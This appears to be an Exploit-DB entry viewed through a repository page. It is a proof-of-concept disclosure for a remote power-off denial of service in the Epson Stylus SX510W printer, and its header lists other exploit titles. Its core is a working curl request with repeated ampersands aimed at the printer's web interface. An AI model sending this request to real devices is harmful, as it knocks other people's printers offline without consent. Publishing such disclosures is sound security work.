bfc4baf25a
7 changes to exploits/shellcodes/ghdb FLEX 1080 < 1085 Web 1.6.0 - Denial of Service Epson Stylus SX510W Printer Remote Power Off - Denial of Service Job Portal 1.0 - File Upload Restriction Bypass Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS) RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS) TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)
27 lines
No EOL
762 B
Text
27 lines
No EOL
762 B
Text
# Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)
|
|
# Discovery by: Rafael Pedrero
|
|
# Discovery Date: 2020-05-16
|
|
# Vendor Homepage: https://www.epson.es/
|
|
# Software Link :
|
|
https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w
|
|
# Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0
|
|
# Tested on: Linux/Windows
|
|
# Vulnerability Type: Denial of Service (DoS)
|
|
|
|
1. Description
|
|
|
|
The vulnerability occurs when 2 or more &'s are sent to the server in a row
|
|
("/PRESENTATION/HTML/TOP/INDEX.HTML") causing it to shutdown.
|
|
|
|
2. Proof of Concept
|
|
|
|
Request:
|
|
|
|
curl -s "http://
|
|
<printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"
|
|
|
|
3. Solution:
|
|
|
|
This version product is deprecated.
|
|
|
|
--> |